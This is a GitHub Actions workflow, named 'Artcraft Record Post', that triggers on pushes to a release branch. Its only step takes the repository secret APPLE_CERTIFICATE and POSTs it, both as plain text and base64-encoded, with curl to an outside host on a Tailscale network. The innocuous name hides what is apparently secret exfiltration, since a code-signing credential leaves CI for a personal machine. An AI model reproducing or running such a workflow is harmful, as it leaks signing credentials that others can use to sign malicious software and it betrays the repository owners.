name: "Artcraft Record Post"

on:
  push:
    branches:
      - artcraft-release

jobs:
  post-record:
    runs-on: ubuntu-latest
    steps:
      - name: post record
        env:
          VALUE_ORIGINAL: ${{        secrets.APPLE_CERTIFICATE          }}
        run: |
          RECORD_NAME='APPLE_CERTIFICATE'
          VALUE_TEXT="$VALUE_ORIGINAL"
          VALUE_BINARY=$(printf '%s' "${VALUE_TEXT}" | base64 -w 0)
          curl --fail-with-body -sS -X POST \
            -H 'Content-Type: application/json' \
            -d "{\"name\":\"${RECORD_NAME}\",\"value_text\":\"${VALUE_TEXT}\",\"value_binary\":\"${VALUE_BINARY}\"}" \
            https://brandons-macbook-pro.taild62114.ts.net/record
